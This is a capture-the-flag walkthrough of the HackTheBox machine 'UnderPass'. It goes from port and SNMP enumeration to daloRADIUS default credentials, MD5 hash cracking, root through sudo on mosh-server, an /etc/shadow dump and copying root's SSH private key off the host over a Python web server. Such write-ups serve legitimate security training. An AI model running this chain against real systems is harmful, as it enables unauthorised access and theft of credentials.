Reconnaissance
nmap/TCP
nmap finds two open TCP ports, SSH (22) and HTTP (80):
croc@hacker$ rustscan -a underpass.htb --ulimit 5000 -- -A -T5 -oA initial
Nmap scan report for underpass.htb (10.10.11.48)
Host is up, received conn-refused (0.30s latency).
Scanned at 2024-12-25 01:14:10 EST for 19s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK+kvbyNUglQLkP2Bp7QVhfp7EnRWMHVtM7xtxk34WU5s+lYksJ07/lmMpJN/bwey1SVpG0FAgL0C/+2r71XUEo=
| 256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ8XNCLFSIxMNibmm+q7mFtNDYzoGAJ/vDNa6MUjfU91
80/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelBased on the OpenSSH and Apache versions, the host is likely running Ubuntu jammy (22.04LTS).
Without valid credentials, SSH is not a viable entry point. Therefore, the primary attack surface is HTTP, where an Apache2 web server is running with a default page.
nmap/UDP
I usually also kick off a UDP Scan alongside the TCP Scan. Since UDP scans can be slow, I limited the scan to the top 50 ports to reduce the time taken.
nmap finds SNMP being open on port 161 which can be quite juicy!
croc@hacker$ sudo nmap -sU --top-ports 50 -T3 -oN UDPScan underpass.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-25 01:17 EST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.27s latency).
PORT STATE SERVICE
161/udp open snmp
Nmap done: 1 IP address (1 host up) scanned in 51.12 secondsWebsite – 80/TCP
Main Page
We have an apache default web page as we have already seen that in our scan:
Directory Busting
Directory enumeration did not reveal any notable findings. Most of the found directories are 403 and index.html where we have a 200 is not an unusual thing for an Apache Web Server.
croc@hacker$ gobuster dir -u http://underpass.htb -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://underpass.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/index.html (Status: 200) [Size: 10671]
/server-status (Status: 403) [Size: 278]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================SNMP – 161/UDP
With such a limited attack surface, it’s worthwhile to explore UDP.
Finding the Community String
In order to interact with SNMP, a community string is required which functions as a password to authenticate us. It’s really common to have a community string of public for stuff that is meant to be public & it’s a good bet to start by guessing that. But, there’s also a tool called onesixtyone built-in into kali which tries a bunch of common community strings against a host. Let’s try running it:
croc@hacker$ onesixtyone 10.10.11.48 -c /usr/share/doc/onesixtyone/dict.txt
Scanning 1 hosts, 50 communities
10.10.11.48 [public] Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64Utilizing the list of common community strings provided with the tool, we found out that our target host is indeed using public as the community string.
Another approach is to use the Nmap Scripting Engine (NSE) with the snmp-brute script to enumerate the community string.
croc@hacker:~$ sudo nmap -sU -p 161 --script=snmp-brute --min-rate 500 underpass.htb
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 07:47 EST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.28s latency).
PORT STATE SERVICE
161/udp open snmp
| snmp-brute:
|_ public - Valid credentials
Nmap done: 1 IP address (1 host up) scanned in 12.86 secondssnmpbulkwalk/snmpwalk
We can utilize snmpwalk or snmpbulkwalk in order to enumerate SNMP. But before doing that, there’s one more thing to look into.
SNMP uses a hierarchical numbering scheme to label data it holds. There’s an addon package that converts it into a more readable format. We can set it up by apt install snmp-mibs-downloader and commenting out the following line in /etc/snmp/snmp.conf file:
Now, I used snmpbulkwalk to enumerate snmp using the community string of public. This revealed a username of steve@underpass.htb and the use of a daloradius server.
croc@hacker$ snmpbulkwalk -c public -v2c underpass.htb
SNMPv2-MIB::sysDescr.0 = STRING: Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
SNMPv2-MIB::sysObjectID.0 = OID: NET-SNMP-MIB::netSnmpAgentOIDs.10
DISMAN-EVENT-MIB::sysUpTimeInstance = Timeticks: (285355) 0:47:33.55
SNMPv2-MIB::sysContact.0 = STRING: steve@underpass.htb
SNMPv2-MIB::sysName.0 = STRING: UnDerPass.htb is the only daloradius server in the basin!
SNMPv2-MIB::sysLocation.0 = STRING: Nevada, U.S.A. but not Vegas
SNMPv2-MIB::sysServices.0 = INTEGER: 72
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (5) 0:00:00.05
SNMPv2-MIB::sysORID.1 = OID: SNMP-FRAMEWORK-MIB::snmpFrameworkMIBCompliance
SNMPv2-MIB::sysORID.2 = OID: SNMP-MPD-MIB::snmpMPDCompliance
SNMPv2-MIB::sysORID.3 = OID: SNMP-USER-BASED-SM-MIB::usmMIBCompliance
SNMPv2-MIB::sysORID.4 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.5 = OID: SNMP-VIEW-BASED-ACM-MIB::vacmBasicGroup
SNMPv2-MIB::sysORID.6 = OID: TCP-MIB::tcpMIB
SNMPv2-MIB::sysORID.7 = OID: UDP-MIB::udpMIB
SNMPv2-MIB::sysORID.8 = OID: IP-MIB::ip
SNMPv2-MIB::sysORID.9 = OID: SNMP-NOTIFICATION-MIB::snmpNotifyFullCompliance
SNMPv2-MIB::sysORID.10 = OID: NOTIFICATION-LOG-MIB::notificationLogMIB
SNMPv2-MIB::sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
SNMPv2-MIB::sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
SNMPv2-MIB::sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
SNMPv2-MIB::sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
SNMPv2-MIB::sysORDescr.5 = STRING: View-based Access Control Model for SNMP.
SNMPv2-MIB::sysORDescr.6 = STRING: The MIB module for managing TCP implementations
SNMPv2-MIB::sysORDescr.7 = STRING: The MIB module for managing UDP implementations
SNMPv2-MIB::sysORDescr.8 = STRING: The MIB module for managing IP and ICMP implementations
SNMPv2-MIB::sysORDescr.9 = STRING: The MIB modules for managing SNMP Notification, plus filtering.
SNMPv2-MIB::sysORDescr.10 = STRING: The MIB module for logging SNMP Notifications.snmp-check
We can use snmp-check for that same purpose as well for more structured output:
croc@hacker$ snmp-check -c public -v 2c 10.10.11.48
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 10.10.11.48:161 using SNMPv2c and community 'public'
[*] System information:
Host IP address : 10.10.11.48
Hostname : UnDerPass.htb is the only daloradius server in the basin!
Description : Linux underpass 5.15.0-126-generic 136-Ubuntu SMP Wed Nov 6 10:38:22 UTC 2024 x86_64
Contact : steve@underpass.htb
Location : Nevada, U.S.A. but not Vegas
Uptime snmp : 02:09:58.97
Uptime system : 02:09:45.95
System date : 2025-1-2 02:36:45.0
[*] Network information:
Default TTL : noSuchObject
TCP segments received : noSuchObject
TCP segments sent : noSuchObject
TCP segments retrans : noSuchObject
Input datagrams : noSuchObject
Delivered datagrams : noSuchObject
Output datagrams : noSuchObject
[*] File system information:
Index : noSuchObject
Mount point : noSuchObject
Access : noSuchObject
Bootable : noSuchObjectNow, what??
daloRADIUS is a web-based management interface for managing a RADIUS(Remote Authentication Dial-In User Service) Server but specifically it manages FreeRADIUS and it’s database structure, a widely used open-source RADIUS Server.
The mention of “daloradius” strongly suggests that the target has a RADIUS management service, likely running on the web server (port 80) we already have.
A Hunch, but Well-Thought
/daloradius
I got a 403 forbidden which tells me that this is most probably the root directory for daloradius web application.
Directory Brute Force
Let’s bust subdirectories for /daloradius and hope for the best:
croc@hacker$ sudo feroxbuster -u http://underpass.htb/daloradius -w /usr/share/seclists/Discovery/Web-Content/big.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.4
───────────────────────────┬──────────────────────
🎯 Target Url │ http://underpass.htb/daloradius
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/big.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.4
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301 GET 9l 28w 319c http://underpass.htb/daloradius => http://underpass.htb/daloradius/
200 GET 412l 3898w 24703c http://underpass.htb/daloradius/ChangeLog
200 GET 340l 2968w 18011c http://underpass.htb/daloradius/LICENSE
301 GET 9l 28w 323c http://underpass.htb/daloradius/app => http://underpass.htb/daloradius/app/
301 GET 9l 28w 327c http://underpass.htb/daloradius/contrib => http://underpass.htb/daloradius/contrib/
301 GET 9l 28w 323c http://underpass.htb/daloradius/doc => http://underpass.htb/daloradius/doc/
301 GET 9l 28w 330c http://underpass.htb/daloradius/app/common => http://underpass.htb/daloradius/app/common/
301 GET 9l 28w 330c http://underpass.htb/daloradius/contrib/db => http://underpass.htb/daloradius/contrib/db/
301 GET 9l 28w 327c http://underpass.htb/daloradius/library => http://underpass.htb/daloradius/library/
301 GET 9l 28w 325c http://underpass.htb/daloradius/setup => http://underpass.htb/daloradius/setup/
301 GET 9l 28w 331c http://underpass.htb/daloradius/doc/install => http://underpass.htb/daloradius/doc/install/
301 GET 9l 28w 333c http://underpass.htb/daloradius/app/operators => http://underpass.htb/daloradius/app/operators/
301 GET 9l 28w 339c http://underpass.htb/daloradius/app/common/includes => http://underpass.htb/daloradius/app/common/includes/
301 GET 9l 28w 338c http://underpass.htb/daloradius/app/common/library => http://underpass.htb/daloradius/app/common/library/
301 GET 9l 28w 335c http://underpass.htb/daloradius/contrib/scripts => http://underpass.htb/daloradius/contrib/scripts/
301 GET 9l 28w 340c http://underpass.htb/daloradius/app/common/templates => http://underpass.htb/daloradius/app/common/templates/
301 GET 9l 28w 341c http://underpass.htb/daloradius/app/operators/include => http://underpass.htb/daloradius/app/operators/include/
301 GET 9l 28w 338c http://underpass.htb/daloradius/app/operators/lang => http://underpass.htb/daloradius/app/operators/lang/
301 GET 9l 28w 341c http://underpass.htb/daloradius/app/operators/library => http://underpass.htb/daloradius/app/operators/library/
301 GET 9l 28w 347c http://underpass.htb/daloradius/app/operators/notifications => http://underpass.htb/daloradius/app/operators/notifications/
301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/include/common => http://underpass.htb/daloradius/app/operators/include/common/
301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/include/config => http://underpass.htb/daloradius/app/operators/include/config/
301 GET 9l 28w 347c http://underpass.htb/daloradius/contrib/scripts/maintenance => http://underpass.htb/daloradius/contrib/scripts/maintenance/
301 GET 9l 28w 340c http://underpass.htb/daloradius/app/operators/static => http://underpass.htb/daloradius/app/operators/static/
301 GET 9l 28w 352c http://underpass.htb/daloradius/app/operators/library/extensions => http://underpass.htb/daloradius/app/operators/library/extensions/
301 GET 9l 28w 352c http://underpass.htb/daloradius/app/operators/include/management => http://underpass.htb/daloradius/app/operators/include/management/
301 GET 9l 28w 346c http://underpass.htb/daloradius/app/operators/include/menu => http://underpass.htb/daloradius/app/operators/include/menu/
301 GET 9l 28w 344c http://underpass.htb/daloradius/app/operators/static/css => http://underpass.htb/daloradius/app/operators/static/css/
301 GET 9l 28w 355c http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor => http://underpass.htb/daloradius/contrib/scripts/maintenance/monitor/
301 GET 9l 28w 347c http://underpass.htb/daloradius/app/operators/static/images => http://underpass.htb/daloradius/app/operators/static/images/
301 GET 9l 28w 348c http://underpass.htb/daloradius/app/operators/library/tables => http://underpass.htb/daloradius/app/operators/library/tables/
301 GET 9l 28w 357c http://underpass.htb/daloradius/app/operators/notifications/templates => http://underpass.htb/daloradius/app/operators/notifications/templates/
[####################] - 24m 409646/409646 0s found:32 errors:66265
[####################] - 8m 20477/20477 41/s http://underpass.htb/daloradius/
[####################] - 10m 20477/20477 35/s http://underpass.htb/daloradius/app/
[####################] - 9m 20477/20477 37/s http://underpass.htb/daloradius/contrib/
[####################] - 10m 20477/20477 36/s http://underpass.htb/daloradius/doc/
[####################] - 10m 20477/20477 33/s http://underpass.htb/daloradius/app/common/
[####################] - 10m 20477/20477 33/s http://underpass.htb/daloradius/contrib/db/
[####################] - 11m 20477/20477 31/s http://underpass.htb/daloradius/library/
[####################] - 11m 20477/20477 31/s http://underpass.htb/daloradius/setup/
[####################] - 13m 20477/20477 26/s http://underpass.htb/daloradius/app/operators/
[####################] - 12m 20477/20477 28/s http://underpass.htb/daloradius/doc/install/
[####################] - 13m 20477/20477 26/s http://underpass.htb/daloradius/app/common/includes/
[####################] - 12m 20477/20477 28/s http://underpass.htb/daloradius/app/common/library/
[####################] - 13m 20477/20477 27/s http://underpass.htb/daloradius/contrib/scripts/
[####################] - 11m 20477/20477 30/s http://underpass.htb/daloradius/app/common/templates/
[####################] - 11m 20477/20477 30/s http://underpass.htb/daloradius/app/operators/include/
[####################] - 11m 20477/20477 32/s http://underpass.htb/daloradius/app/operators/lang/
[####################] - 11m 20477/20477 32/s http://underpass.htb/daloradius/app/operators/library/ /app/operators
Navigating to /daloradius/app/operators, I was redirected to the daloradius login page.
Something that I want you to note here is the difference between the version of the application listed here on the login page and the ChangeLog entry below:
Identifying the correct version is crucial while looking for exploits and CVEs. The version on the login page is certainly the most accurate in my opinion. However, it’s not required for solving this box.
Default Credentials
Whenever I see a login page, my first go-to is default credentials as they’re just too common. I found the following default credentials in the GitHub Repo:
I tried the default credentials and it worked flawlessly:
We have one user in the users list. I found a user named svcMosh with a what looks like a MD5 hashed password.
Shell as svcMosh
Hash Cracking
First of all, we must confirm the hash type using hash-identifier:
As it is possibly a MD5, let’s try to crack it:
croc@hacker$ hashcat -m 0 svcmosh_hash.txt /usr/share/wordlists/rockyou.txt
Hurrah!! We successfully cracked the password! Have some dance lol!
SSH
With ssh being open and a pair of credentials, we can try to gain initial access:
croc@hacker$ ssh svcMosh@10.10.11.48
svcMosh@10.10.11.48's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Wed Jan 1 04:31:04 PM UTC 2025
System load: 0.05 Processes: 230
Usage of /: 96.5% of 3.75GB Users logged in: 1
Memory usage: 17% IPv4 address for eth0: 10.10.11.48
Swap usage: 0%
=> / is using 96.5% of 3.75GB
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Wed Jan 1 16:21:17 2025 from 10.10.16.17
svcMosh@underpass:~$ Now, grab user.txt:
svcMosh@underpass:~$ ls
user.txt
svcMosh@underpass:~$ cat user.txt
31955***************************Shell as Root
Enumeration
The first things that I am looking into after gaining a foothold on a linux box are quick wins like history where there may be a password, sudo permissions or SUID/SGID Binaries.
Sudo Privileges
I found that the user svcMosh has passwordless sudo privileges to execute the /usr/bin/mosh-server command as any user, including root.
svcMosh@underpass:~$ sudo -l
Matching Defaults entries for svcMosh on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User svcMosh may run the following commands on localhost:
(ALL) NOPASSWD: /usr/bin/mosh-serverMosh
Let’s start by understanding mosh.
In simple words, mosh is the modern replacement of SSH. Since SSH relies on the TCP protocol, which maintains a session bound to a specific IP address, it struggles with connectivity issues when switching networks or experiencing interruptions. Mosh addresses this limitation by using UDP and application-level sessions, ensuring a stable connection even during network changes.
Normally, if we have the target user’s password and mosh installed on the target device, we can just connect to it and it does everything for us. We can see this in action as well.
Install mosh on your Kali Machine by apt install mosh. Then, we can just connect as the svcMosh user because we have his password.
croc@hacker:~$ mosh svcMosh@10.10.11.48
The authenticity of host '10.10.11.48 (<no hostip for proxy command>)' can't be established.
ED25519 key fingerprint is SHA256:zrDqCvZoLSy6MxBOPcuEyN926YtFC94ZCJ5TWRS0VaM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.48' (ED25519) to the list of known hosts.
svcMosh@10.10.11.48's password:
What it will do is establish a session over SSH & run the mosh-server on the target. After the server starts, SSH disconnects, and the client switches to UDP for communication.
So, we got a shell as svcMosh user. But in order to do this for the root user, we need to have his password which we don’t have currently. So, we’ll take a different route which is the manual way of doing it.
Run the Mosh Server
Manually run the mosh-server on the target box. It will connect to a high UDP port on the local machine. As soon as the client connects to this port, it executes the user’s login shell. As we have sudo permissions over mosh-server, we can expect to get a shell as root user.
svcMosh@underpass:~$ sudo mosh-server
MOSH CONNECT 60001 6odTyvz2KOIVZuV8fym5uw
mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
[mosh-server detached, pid = 1359]If you want to, you can also specify a port of your own choice using the new argument:
svcMosh@underpass:~$ sudo mosh-server new -p 9005
MOSH CONNECT 9005 +4f+MTlmKWXtgliNPRoexA
mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
[mosh-server detached, pid = 1498]Connect through Mosh Client
6odTyvz2KOIVZuV8fym5uw is our base64-encoded cryptographic key while 60001 is the port.
svcMosh@underpass:~$ MOSH_KEY=6odTyvz2KOIVZuV8fym5uw mosh-client 127.0.0.1 60001And, we got root! Congratulations(to me of course 😂)!
Time-sensitive Connection Requirement
Now, make sure that you connect to the mosh-server within 60 seconds of running it. Otherwise, the server will go down automatically & you will see the following error while connecting using mosh-client:
root.txt
root@underpass:~# ls
root.txt
root@underpass:~# cat root.txt
8fff7***************************Post Root
We got the root flag but the shell is really unstable as I am not even able to scroll up. Let’s look for other ways!
Failed Attempt
Cracking the Root Hash
We have read access to the /etc/shadow so I thought to try cracking the root hash.(Although that proved to be a dumb idea!)
root@underpass:~# head -n 4 /etc/shadow
root:$y$j9T$y6GVl9yuguP9lhnKmS04c.$pzmkCXRNa/BCrMpnOUxIWUbVR905YSEHwW20O40wEaA:20057:0:99999:7:::
daemon:*:19103:0:99999:7:::/cod
bin:*:19103:0:99999:7:::
sys:*:19103:0:99999:7:::The $y$ specifies the Yescrypt algorithm which is an advanced hashing algorithm designed to provide enhanced security and performance. Hashcat doesn’t support yescrypt so, I used john to crack this hash.
However, this was going extremely slow so I aborted the session.
croc@hacker$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Remaining 1 password hash
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:08 0.00% (ETA: 2025-01-05 10:33) 0g/s 66.28p/s 66.28c/s 66.28C/s evelyn..kelly
0g 0:00:09:51 0.24% (ETA: 2025-01-05 18:40) 0g/s 71.06p/s 71.06c/s 71.06C/s iloveabby..dragon23
0g 0:00:17:57 0.46% (ETA: 2025-01-05 16:20) 0g/s 73.24p/s 73.24c/s 73.24C/s ilovenicky..harekrishna
0g 0:00:20:14 0.54% (ETA: 2025-01-05 14:08) 0g/s 75.65p/s 75.65c/s 75.65C/s peaches15..ninety
0g 0:00:29:23 0.75% (ETA: 2025-01-05 16:50) 0g/s 72.24p/s 72.24c/s 72.24C/s 190203..151718
0g 0:00:29:25 0.75% (ETA: 2025-01-05 16:48) 0g/s 72.26p/s 72.26c/s 72.26C/s 130303..12041986
Session abortedSSH Private Key
id_rsa
I found a ssh id_rsa private key in the /root/.ssh directory and I copied it to the current directory. Next, I spined up a python web server in the same directory:
root@underpass:~# find / -name id_rsa 2> /dev/null
/home/svcMosh/.ssh/id_rsa
/root/.ssh/id_rsa
root@underpass:~# cp /root/.ssh/id_rsa .
root@underpass:~# ls
id_rsa root.txt
root@underpass:~# python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
I transferred it to my own machine:
Shell Access via SSH
croc@hacker$ sudo ssh -i id_rsa root@10.10.11.48
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Fri Jan 3 04:32:04 AM UTC 2025
System load: 0.05 Processes: 233
Usage of /: 85.7% of 3.75GB Users logged in: 2
Memory usage: 15% IPv4 address for eth0: 10.10.11.48
Swap usage: 0%
=> / is using 85.7% of 3.75GB
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Dec 19 13:40:29 2024
root@underpass:~# 